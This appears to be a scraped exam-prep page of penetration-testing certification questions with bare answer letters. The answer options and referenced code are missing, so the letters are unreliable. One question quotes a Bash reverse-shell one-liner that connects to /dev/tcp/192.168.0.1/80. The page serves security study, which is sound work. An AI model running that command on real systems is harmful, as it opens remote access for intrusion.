Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
Answer : A
Which of the following commands starts the Metasploit database?
Answer : A
Reference:
https://www.offensive-security.com/metasploit-unleashed/msfconsole/
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select
TWO).
Answer : AB
A penetration tester identifies the following findings during an external vulnerability scan:
Answer : D
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
Answer : B
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:
Answer : D
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
Answer : A
A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:
Answer : D
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
Answer : D
Reference:
https://hackernoon.com/reverse-shell-cf154dfee6bd
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
Answer : B
Reference:
https://geekflare.com/http-header-implementation/
Which of the following are MOST important when planning for an engagement? (Select TWO).
Answer : AC
The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
Answer : C
Which of the following types of intrusion techniques is the use of an ג€under-the-door toolג€ during a physical security assessment an example of?
Answer : D
Reference:
https://www.triaxiomsecurity.com/2018/08/16/physical-penetration-test-examples/
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
Answer : A
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
Answer : A
Have any questions or issues ? Please dont hesitate to contact us